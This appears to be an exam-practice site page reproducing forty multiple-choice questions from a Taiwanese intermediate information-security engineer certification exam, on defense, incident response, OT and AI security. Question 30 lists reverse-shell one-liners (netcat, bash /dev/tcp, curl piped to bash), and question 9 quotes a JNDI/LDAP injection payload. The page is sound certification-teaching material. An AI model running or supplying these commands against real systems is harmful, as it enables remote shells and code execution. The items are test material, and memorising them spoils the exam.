阿摩線上測驗
登入
首頁
>
iPAS◆資訊安全防護實務◆中級
> 115年 - 115-2 資訊安全工程師能力鑑定中級試題:資訊安全防護實務#144572
115年 - 115-2 資訊安全工程師能力鑑定中級試題:資訊安全防護實務#144572
科目:
iPAS◆資訊安全防護實務◆中級 |
年份:
115年 |
選擇題數:
40 |
申論題數:
0
試卷資訊
所屬科目:
iPAS◆資訊安全防護實務◆中級
選擇題 (40)
1. 下列何者最符合 MITRE ATT&CK 的橫向移動(Lateral Movement)技術?
(A) 利用內部魚叉式網路釣魚獲得存取權
(B) 繞過使用者帳戶控制(User Account Control, UAC)
(C) 通過可卸除式磁碟進行通信
(D) 使用 LLMNR/NBT-NS 下毒(Poisoning)及 SMB 中繼(Relay)
2. 攻擊者利用跨站腳本攻擊(Cross-Site Scripting, XSS)竊取 Cookie,進而冒用使用者
會話(Session),這種行為屬於下列何種威脅?
(A) 網路竊聽(Sniffing)
(B) 水坑攻擊(Watering Hole)
(C) 身分偽造(Impersonation)
(D) 權限提升(Privilege Escalation)
3. 某購物平台在進行系統架構優化時,發現會員查詢模組存在嚴重的「非授權資料存
取」弱點,經分析是由於開發人員未在伺服器端對請求參數中的識別碼進行權限驗
證所致。資安團隊在規劃該弱點的修補與風險緩解策略時,考量到系統的高可用性
與長期維護成本,下列哪一項策略在資安防護與架構整合上屬於最適切的規劃?
(A) 採用基於物件的存取控制機制,在應用程式伺服器端實施身分驗證後的物件級授
權,驗證當前使用者是否具備該識別碼之存取權限
(B) 建立一套自動化的弱點偵測系統,針對該模組進行週期性的滲透測試,一旦偵測
到可存取的異常 ID,即透過系統自動封鎖該使用者的連線來源 IP
(C) 在應用程式層部署 Web 應用程式防火牆(WAF)
,並將此類識別碼漏洞列入規則
庫進行攔截,以在不更動原始程式碼的情況下快速緩解風險
(D) 實施基於強制存取控制(MAC)的架構,將所有會員的存取請求強制進行安全標
籤對應,並要求所有舊有模組必須重新設計以符合安全層級規範
複選題
4. 關於伺服器偽造請求(Server-Side Request Forgery,SSRF)的描述,下列哪些選項較
為正確?(複選)
(A) 此類弱點通常發生在跳轉網址或讀取特定網址圖片的參數沒有過濾內容,導致被
攻擊者利用
(B) 此類弱點無法用於掃描內網其他伺服器的 port,所以危害很小
(C) 此類弱點可以用來讀取其他 URL 協議,例如 file://、ftp://、gopher://
(D) 此類弱點無法用來掃描 127.0.0.1 或 localhost
第 1 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
5. 【題組 1】情境如附圖所示。身為平台的資安應變經理,在此次事件中,攻擊者利用
AI 推薦引擎的漏洞作為初始破口。從弱點管理的角度來看,此事件暴露了該平台在
哪個環節存在最嚴重的疏失?
(A) 網站前端未能有效防禦跨網站指令碼(Cross-Site Scripting, XSS)攻擊
(B) 未能對所有員工進行充分的社交工程防範演練
(C) 公司的實體安全措施不足,導致機房被入侵
(D) 缺乏對第三方服務與軟體元件的攻擊面管理(Attack Surface Management)與及
時修補
6. 【題組 1】情境如附圖所示。身為平台的資安應變經理,在攻擊者入侵後,在容器映
像檔儲存庫中污染基礎映像檔的行為,是近年來哪一種類型攻擊的典型手法?
(A) 密碼噴灑攻擊(Password Spraying)
(B) 中間人攻擊(Man-in-the-Middle, MitM)
(C) 軟體供應鏈攻擊(Software Supply Chain Attack)
(D) 阻斷服務攻擊(Denial-of-Service, DoS)
第 2 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
7. 【題組 1】情境如附圖所示。身為平台的資安應變經理,為了緊急恢復平台服務並清
除所有受感染的容器,下列哪一項防護與應變實務在技術上最為即時且有效?
(A) 要求雲端服務供應商出具一份完整的事件調查報告
(B) 利用雲端工作負載保護平台(CWPP)掃描運行中的容器,識別並終止所有受感
染的實例(Instance),同時觸發 CI/CD 流程以乾淨的映像檔重新部署
(C) 立即重新部署整個 Kubernetes 叢集,並從原始的映像檔進行重新安裝
(D) 手動登入每一台主機節點,一一找出並刪除惡意程序
複選題
8. 【題組 1】情境如附圖所示。身為平台的資安應變經理,為了徹底解決此次事件暴露
出的防護架構問題,並防止未來類似攻擊發生,平台應採取下列哪些防護強化措施?
(複選)
(A) 為所有開發人員的電腦安裝最新版的文書處理軟體
(B) 在開發流程中導入容器映像檔掃描與簽章機制,確保僅有受信任的映像檔能被部
署
(C) 實施更嚴格的網路出口流量過濾規則(Egress Filtering),阻擋加密貨幣挖礦等異
常的對外連線
(D) 建立零信任網路原則,嚴格限制 Kubernetes 叢集內部不同服務之間的存取權限
第 3 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
9. 分析 WAF 攔截到的攻擊請求時,發現一段針對公司內部 Java Spring Boot 應用程式
的封包,內容包含:${jndi:ldap://192.168.10.5/Exploit} 已知該伺服器的 JDK 版本較
舊,未啟用 com.sun.jndi.ldap.object.trustURLCodebase=false。在無法立即升級應用程
式碼的情 況下, 下列 何項技術 對直接阻斷此類遠端程式碼執行(Remote Code
Execution, RCE)攻擊最為適切?
(A) 在防火牆封鎖所有連往 192.168.10.5 的 TCP 80 流量
(B) 將伺服器的 HTTPS 憑證更換為強加密演算法(如 RSA 4096)
(C) 在 WAF 上啟用針對 jndi 關鍵字的輸入驗證規則
(D) 停用 Web 伺服器的 HTTP TRACE 方法
10. 資安團隊收到一則關於「特定駭客組織利用零時差漏洞攻擊 VPN 設備」的威脅情資。
在尚未釋出官方修補程式(Patch)前,下列何項緩解措施最具防護實效?
(A) 實施虛擬修補(Virtual Patching),在 WAF 或 IPS 阻擋特定攻擊特徵
(B) 忽略此情資,等待官方釋出正式修補程式後再處理
(C) 要求全體員工重新申請 VPN 帳號
(D) 立即公開招標並更換不同廠牌的 VPN 設備
11. 某政府機關在業務衝擊分析(Business Impact Analysis, BIA)後,針對某核心系統訂
定目標:MTD(Maximum Tolerable Downtime):8 小時;RTO(Recovery Time
Objective):12 小時;RPO(Recovery Point Objective):4 小時。下列何者最能說明
此規劃存在的問題?
(A) RTO 超過 MTD,可能導致系統完成復原時已超出業務可接受的中斷時間
(B) RTO 與 RPO 的設定差距較大,表示復原程序設計不完整
(C) RPO 與 MTD 間的差距可能造成備份頻率不足
(D) MTD 應與 RPO 保持相同數值,以利災難復原演練
12. 某 CI 提供者規劃更新監控系統,採購文件已詳列功能規格、保固年限及教育訓練需
求,但未要求廠商提供漏洞處理流程、安全更新機制、事件通報方式或產品生命週期
支援資訊。驗收完成後,廠商表示相關內容將依未來維護需求另行討論。身為專案審
查委員,下列何者最適合作為改善建議?
(A) 將系統功能測試納入年度查核項目,並於維護期間逐步確認安全能力
(B) 將設備更新責任納入維護契約內容,並要求維護廠商配合改善措施
(C) 將產品生命週期納入採購與契約內容,作為驗收及後續維運依據
(D) 將教育訓練及技術移轉納入驗收程序,並要求操作人員完成相關課程
第 4 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
13. 某公司委託第三方廠商維護 ERP 系統,並提供專屬 VPN 帳號供遠端維護使用。近
期 SOC 發現異常資料存取行為,經調查後確認攻擊者已入侵供應商環境,並利用遭
竊之維護帳號成功登入公司內部系統。進一步分析發現如附圖所示,為降低未來類
似風險,下列何者最適合作為改善措施?
• VPN 已啟用 MFA
• ERP 系統已完成最新安全更新
• 攻擊者僅存取與維護工作相關之資料
• 維護帳號長期擁有固定存取權限
(A) 導入動態權限存取機制
(B) 增加弱點掃描頻率
(C) 提高 MFA 驗證頻率
(D) 要求供應商通過 ISO 20000 驗證
14. 某組織從合作單位接收到一份威脅情資通報,內容包含近期觀察到的攻擊行為特徵
與相關指標,其中也帶入了 TLP(Traffic Light Protocol)。情資文件中明確標註為
TLP:AMBER,並說明該資訊僅供接收單位內部相關人員進行防護與應變參考,不適
合對外公開散布。關於上述情資的使用方式,下列何者正確?
(A) 將情資內容納入對外發布的資安報告中
(B) 於組織內部資安相關人員間分享,用於防護與應變決策
(C) 將情資轉交媒體單位以提高社會警覺
(D) 將該情資完整轉發至公開社群平台,提醒其他組織注意
複選題
15. 企業網站遭受大規模分散式阻斷服務(DDoS)攻擊。經分析,攻擊流量特徵為大量
的 HTTP GET 請求(Layer 7 Flood),導致後端資料庫耗盡連線數。下列哪些防護策
略適用於此情境?(複選)
(A) 啟用 CDN 服務,利用邊緣節點快取靜態內容以分流請求
(B) 在防火牆上封鎖所有 UDP 流量
(C) 設定 WAF 的速率限制(Rate Limiting),針對單一 IP 限制請求頻率
(D) 實施人機驗證機制(如 CAPTCHA),過濾自動化機器人流量
複選題
16. 在製造業場域中,OT 環境常存有無法更新修補程式的舊系統(Legacy OS) 。在不影
響生產線運作的前提下,下列哪些補償性控制措施(Compensating Controls)是適當
的?(複選)
(A) 依據普渡模型(Purdue Model)進行網路分段,設立工業 DMZ
(B) 限制 OT 網路內的 USB 儲存裝置存取,並設置檢查站
(C) 強制將所有 PLC 與 HMI 直接連網,以便遠端更新與維護
(D) 部署被動式 OT 網路探針,監控異常指令與通訊行為
第 5 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
17. 【題組 2】情境如附圖一所示。下列何項是最有效、最優先需執行的防護與應變措
施,以阻止紅隊進一步外洩 AI 模型或資料庫?
(A) 重新訓練模型,使其更新權重,避免紅隊用原始模型成功外洩內容
(B) 啟用 Token 流量管制機制,預防遭惡意大量使用
(C) 立即在 AI Gateway 啟用行為異常偵測(Behavior Anomaly Detection),封鎖正在
進行可疑快速查詢或非正常模式的 API Token
(D) 立即將所有 AI API 關閉,包含內部與外部,以阻止任何存取
第 6 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
18. 【題組 2】情境如附圖一所示。你身為資安事件應變小組成員,可以採取以下哪些應
變動作(附圖二)。下列選項組合何者正確?
(A) 2、3、4
(B) 6、7、8
(C) 1、2、5
(D) 4、6、8
第 7 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
19. 【題組 2】情境如附圖一、三所示。最合理的安全判斷為下列何項?
(A) 屬於正常使用行為,因為 HTTPS 流量正常
(B) 是傳統 Web 攻擊(如 XSS),應優先進行資料庫弱點掃描
(C) 疑似 AI 資料外洩,需立即啟動事件應變及調查
(D) 代表模型本身有漏洞,應立即重新訓練 AI 模型以修補問題
第 8 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
複選題
20. 【題組 2】情境如附圖一所示。某天 SOC(Security Operations Center,資安監控中
心)收到附圖四的警訊,請判斷最可能代表下列哪些攻擊行為?(複選)
(A) 資源耗盡攻擊
(B) 模型竊取
(C) 提示詞注入
(D) 模型汙染攻擊
第 9 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
21. 企業內部的某一台 AD Domain Controller(網域控制站)伺服器忽然出現異常高 CPU
使用率,且資安工程師同時觀察到 LSASS(本機安全認證子系統服務)流程被非預
期程式存取。若以事件應變的角度來評估,下列何項最有可能是伺服器目前正面臨
的威脅?
(A) 攻擊者正在進行 Credential Stuffing,但是為了避免鎖定帳號,只嘗試了兩次就停
止了
(B) 攻擊者想要變更當前使用者的群組
(C) 攻擊者正在利用 Zerologon 漏洞,想取得 AD 伺服器控制權
(D) 攻擊者正在進行 Credential Dumping,想撈取 AD 伺服器機敏資料
22. 近期發生多起攻擊者利用 AitM(Adversary-in-the-Middle)技術繞過多因子驗證的案
例。若貴公司計畫升級現有的 MFA 機制以防禦此類攻擊,下列何項方案最為有效且
符合 FIDO2 標準?
(A) 部署實體安全設備(Security Key)驗證
(B) 採用推播通知(Push Notification)並要求使用者點擊確認
(C) 強制員工使用簡訊(SMS OTP)作為登入的第二因子
(D) 實施複雜密碼策略,要求每 45 天更換一次並不得重複
23. 某企業導入 AI Agent 協助員工查詢內部文件及執行工作流程。某日發現 AI Agent 遭
受 Prompt Injection 攻擊,導致機敏資訊被存取。資安團隊準備進行事件調查,以釐
清攻擊過程及資料外洩範圍。若要提出相關告訴,應優先保存下列哪一項紀錄?
(A) AI 模型推論延遲與 GPU 使用率監控紀錄
(B) 同一使用者短時間內多次觸發 Prompt Injection 防護規則之紀錄
(C) 輸入內容安全檢查(Input Guardrail)所產生的策略違規事件紀錄
(D) 使用者與 AI Agent 的互動紀錄及工具呼叫紀錄
複選題
24. 在網路安全欺騙(Deception)偵測技術中有多種誘餌(Decoys)類型和互動程度,關
於這些偵測技術,下列哪些描述最為正確?(複選)
(A) 實體/完整作業系統誘餌(Real/Full OS decoys)的成本較低,易於大規模擴展部
署
(B) 低互動誘餌(Low-interaction decoys)模擬少量的網路協定和服務,以欺騙攻擊者
(C) 中互動誘餌(Medium-interaction decoys)能讓攻擊者登入,並模擬真實服務回應
(D) 高互動誘餌(High-interaction decoys)涉及使用真實的作業系統、服務和應用程
式,可在安全的沙箱環境中觀察攻擊者行為
第 10 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
25. 【題組 3】情境如附圖所示。從橫向移動偵測與通訊協定分析,檢查該工作站的封包
流量時,發現大量的 TCP 445 與 TCP 135 流量正試圖掃描同網段的其他機台,伴隨
大量的 NTLMSSP_AUTH 失敗紀錄。可是該環境內部並未部署 Active Directory。根
據此現象,攻擊者最可能正在利用下列何種技術進行滲透?
(A) 使用 SNMP 暴力破解獲取網路拓樸資訊
(B) 利用 SMB 漏洞(如 Eternal Blue 或是 SMB Ghost)搭配 Mimikatz 進行側向移動
(C) 進行 ARP 欺騙以實施中間人攻擊(MITM)
(D) 透過 Modbus/TCP 進行暫存器溢位攻擊(Buffer Overflow)
26. 【題組 3】情境如附圖所示。工控環境下的連線行為判定在隔離網段中,所截獲是一
段非典型的流量:工作站向 PLC 發送 Function Code 90 (0x5A)的指令,換言之是 FC
90。已知該環境主要使用 Schneider Electric 的 Modbus 設備,在正常維運僅會有涉及
讀寫的(FC 3, 4, 6, 16)
。關於此 FC 90 指令的描述,下列何者正確?
(A) 這是標準的連線偵測(Keep-alive)封包,由防火牆自動產生
(B) 非公開私有「Unity 協定」指令,可能用於遠端停機、下載韌體或更改程式邏輯
(C) 這是正常的時鐘同步指令,不具威脅性
(D) 這是 Modbus 的廣播指令,用於掃描網段內所有設備
第 11 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
27. 【題組 3】情境如附圖所示。鑑識與應變調查發現,攻擊者已成功控制一台與機械手
臂連接 HMI(Human-Machine Interface)
。該 HMI 運行的是嵌入式 Windows 7 系統。
在不影響生產線即時通訊的前提下,若要進行記憶體採證(Memory Forensics),下
列何種做法最能平衡「技術完整性」與「工控可用性」?
(A) 使用 Velocity 的遠端外掛,直接在不掛載任何代理程式的情況下掃描物理記憶體
(B) 立即拔除該 HMI 的電源,將硬碟取下進行鏡像(Mirroring)採證
(C) 直接對該 HMI 執行 Kernel Panic 觸發藍屏,以獲取完整的 Memory Dump
(D) 透過離線專用的取證 USB 工具,使用 Magnet RAM Capture 等輕量化工具提取,
並密切監控 CPU 使用率
第 12 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
複選題
28. 【題組 3】情境如附圖所示。針對深度防禦與隔離技術,為了徹底解決 IT/OT 整合後
的邊界安全問題,防止類似的「隱蔽通道(Covert Channel)」再次出現,維運團隊決
定在 Level 3(製造運營層)與 Level 4(企業辦公層)之間網路強化防護。下列哪些
技術方法屬於純技術維運範疇且能有效降低風險?(複選)
(A) 部署數據閘道器(Data Diode / One-way Gateway)
,確保數據只能從 OT 端單向流
向 IT 端
(B) 在交換器上啟動「Port Isolation」與「Sticky MAC」,限制未授權設備接入
(C) 修改公司資安手冊,增加「嚴禁使用私人 USB」之條文並要求員工簽署聲明
(D) 實施深度封包檢測(DPI),解析工控協定(如 S7Comm, EtherNet/IP)的酬載
(Payload),監控非白名單內的 Function Code
第 13 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
29. 如附圖所示,此為著名的 EchoLeak kill chain,請問附圖運用了下列哪一項技術?
(A) MCP Tool Poisoning
(B) Indirect Prompt Injection
(C) Model Supply Chain Attack
(D) Data Exfiltration via LLM
30. 在分析 Linux 主機上的可疑命令紀錄時,分析人員發現多筆疑似反彈 shell 的指令。
下列哪一項「不」是常見的 shell 反彈指令?
(A) nc 10.0.0.1 1234 -e /bin/sh
(B) mknod a p; telnet 10.0.0.1 8080 0
a
(C) curl -s http://10.0.0.1 | bash
(D) bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
31. 於作業系統為 Android 之行動裝置上進行動態分析時,若要執行程式碼注入(Code
Injection)和函式掛鉤(Function Hooking)等技術,通常需要取得下列何種權限?
(A) App Sandbox Privileges Only
(B) Root Access
(C) Standard User Privileges
(D) Cloud Administrator Privileges
第 14 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
複選題
32. 針對關鍵基礎設施(OT 環境)進行資安健診與滲透測試時,必須考量工業控制系統
的特殊性。為了避免測試過程造成產線中斷或設備損壞,下列哪些測試策略是必須
嚴格遵守的?(複選)
(A) 對可程式邏輯控制器(PLC)或數據採集與監控系統(SCADA)執行主動式、高
併發的弱點掃描以確保完整性
(B) 優先採用被動式流量監聽(Passive Monitoring)來識別資產與漏洞
(C) 在非生產環境(Staging)或維修期間(Maintenance Window)進行主動測試
(D) 針對老舊系統強行安裝最新的端點偵測與回應(EDR)代理程式以獲取詳細日誌
33. 【題組 4】情境如附圖所示,根據圖中的程序樹與事件時間軸,下列哪一項最合理地
描述此事件的初始執行鏈?
(A) 使用者開啟 Word 文件後,WINWORD.EXE 觸發 PowerShell,PowerShell 再啟動
rundll32.exe 載入可疑 DLL,後續出現 regsvr32.exe 對外連線
(B) WinUpdateSvc 服務建立於 09:12:46,因此可推論它是最早觸發整個程序鏈的來源
(C) explorer.exe 啟動 WINWORD.EXE 屬於正常使用者操作,因此後續所有子程序都
應視為 Office 正常外掛行為
(D) regsvr32.exe 對外連線後觸發 rundll32.exe,再由 rundll32.exe 開啟 PowerShell,最
後啟動 Word 文件
第 15 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
34. 【題組 4】情境如附圖所示,關於 update.dat 的初步分析,下列哪一項判斷最適當?
(A) update.dat 的副檔名不是 .dll,所以即使 PE Header 顯示為 DLL,也不應視為可執
行元件
(B) update.dat 含有 Mozilla/5.0 與 POST /api/v2/checkin,因此只能判斷它與網頁瀏覽
有關
(C) update.dat 位於使用者暫存目錄,因此一定是瀏覽器或 Office 自動產生的暫存檔
(D) update.dat 雖以 .dat 命名,但檔案型態為 PE DLL,且同時出現程序注入、反除
錯、持久化與網路通訊相關字串
第 16 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
35. 【題組 4】情境如附圖所示,若調查人員要確認是否存在程序注入或記憶體中惡意程
式碼執行跡象,下列哪一項證據最直接支持此判斷?
(A) Event ID 7045 顯示建立了 WinUpdateSvc 服務,因此可直接證明 regsvr32.exe 被
注入
(B) netscan 顯示 regsvr32.exe 對外部 IP 建立 TCP/443 連線,代表發生程序注入
(C) pslist 顯示 WINWORD.EXE、powershell.exe、rundll32.exe 與 regsvr32.exe 的父子
程序關係
(D) malfind 顯示 rundll32.exe 與 regsvr32.exe 存在 PAGE_EXECUTE_READWRITE 的
記憶體區段
第 17 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
複選題
36. 【題組 4】情境如附圖所示,綜合圖中資訊,若要撰寫資安健診報告中的「主要風險
敘述」,下列哪些最「不」恰當?(複選)
(A) 該 事 件 應 判 定 為 正 常 Office 文 件 開 啟 流 程 , 因 為 起 點 是 explorer.exe 與
WINWORD.EXE,兩者皆為合法 Windows 與 Office 程序
(B) 該主機疑似遭惡意文件觸發腳本執行,後續使用 PowerShell、rundll32.exe 與
regsvr32.exe 等合法系統工具執行可疑活動
(C) 該事件的主要風險僅限於外部 HTTPS 連線,若封鎖 cdn-update-check[.]com 後,
即可判定主機已完全恢復安全
(D) 該事件應優先歸類為 Windows Update 異常,因為服務名稱為 WinUpdateSvc,且
連線使用 TCP/443,符合一般更新流量特徵
第 18 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
37. 【題組 5】情境如附圖所示,針對工程師引入的開源套件中「間接相依套件被植入惡
意程式碼」的問題。若希望最有效地盤點相依元件、辨識已知漏洞與惡意套件,建立
可追溯元件清單,下列哪一項安全測試元件最為適切?
(A) DAST 動態應用程式安全測試,於執行期間追蹤並盤點相依套件的異常行為
(B) 軟體供應鏈黑箱滲透測試,模擬攻擊探測以羅列第三方元件的已知漏洞
(C) SCA 軟體組成分析,並產出 SBOM(軟體物料清單)
(D) SAST 靜態應用程式安全測試,掃描專案原始碼以建立開源套件弱點清單
第 19 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
38. 【題組 5】情境如附圖所示,針對「晶圓代工廠 API 金鑰與 GDSII 簽章憑證被硬編
碼(hard coded)於版控庫」的問題,依「左移(shift-left)」原則,下列哪一種整合
方式最能在問題擴散前預先攔截?
(A) 等正式環境部署後,以 DAST 對執行中的服務進行掃描
(B) 維持每季一次的人工程式碼審查,由資深工程師逐行檢視
(C) 待滲透測試報告交付後,再依建議逐項修補
(D) 將祕密掃描(Secret Scanning)整合至 pre-commit hook 與 CI 階段,並設為品質
關卡(quality gate),阻擋含金鑰的提交進入版控
第 20 頁,共 22 頁
115 年第 2 次資訊安全工程師-中級能力鑑定【公告試題】
第二科:資訊安全防護實務
考試日期:115 年 08 月 22 日
答案 題目
39. 【題組 5】情境如附圖所示,跨國設計協作入口網站的 REST API 存在「驗證繞過/
越權存取(IDOR)」弱點,此弱點僅在應用程式「執行期」才會顯現,靜態原始碼掃
描並未發現。下列哪一種測試方式最適合用來偵測並驗證這類執行期弱點?
(A) 產出完整的 SBOM 軟體物料清單,全面盤點系統架構與第三方 API 模組的存取
風險
(B) DAST / API 安全測試,並以滲透測試實際驗證可利用性
(C) 執行 SCA 軟體組成分析,比對最新漏洞庫以揪出 API 框架中潛藏的已知驗證缺
失
(D) 整合進階 SAST 靜態程式碼掃描,透過深度資料流分析找出 API 的越權驗證漏洞
複選題
40. 【題組 5】情境如附圖所示,針對「以 AI 生成、植入於 RTL 階段、潛伏觸發的硬體
木馬」這類 2026 年新型態複合威脅,下列哪些是「正確且互補」的縱深防禦與安全
測試元件整合作法?(複選)
(A) 既有的軟體 SAST 工具可涵蓋 HDL / RTL 層級的硬體木馬偵測
(B) 對第三方設計工具鏈導入 SBOM 與供應商資安評估機制(如 SEMI 的 SSCA),
建立來源可信度與可追溯性
(C) 導入專屬的硬體木馬 / RTL 安全驗證(形式化驗證、未使用邏輯與可疑觸發條件
偵測、功能與覆蓋率分析),補足軟體源碼掃描無法涵蓋的層面
(D) 在防火牆阻擋已知惡意 IP,可防止已植入晶片內的潛伏型木馬被觸發
《以下空白》
第 22 頁,共 22 頁
申論題 (0)
相關試卷
115年 - 115-1 資訊安全工程師能力鑑定中級試題:資訊安全防護實務#139174
115年 · #139174
114年 - 114-2 資訊安全工程師能力鑑定中級試題:資訊安全防護實務#130418
114年 · #130418
114年 - 114-1 資訊安全工程師能力鑑定中級試題:資訊安全防護實務#126101
114年 · #126101
113年 - 113-2 資訊安全工程師能力鑑定中級試題:資訊安全防護實務#121982
113年 · #121982
113年 - 113-1 資訊安全工程師能力鑑定中級試題:資訊安全防護實務#119309
113年 · #119309
112年 - 112-2 中級資訊安全工程師能力鑑定試題_科目1:I22資訊安全防護實務#116083
112年 · #116083
112年 - 112-1 中級資訊安全工程師能力鑑定試題:資訊安全防護實務#114235
112年 · #114235
111年 - 111 ipas中級資訊安全工程師能力鑑定試題_科目 2:資訊安全防護實務#112999
111年 · #112999
110年 - 110 中級資訊安全工程師能力鑑定試題:資訊安全防護實務#104035
110年 · #104035
109年 - 109 中級資訊安全工程師能力鑑定:資訊安全防護實務#90128
109年 · #90128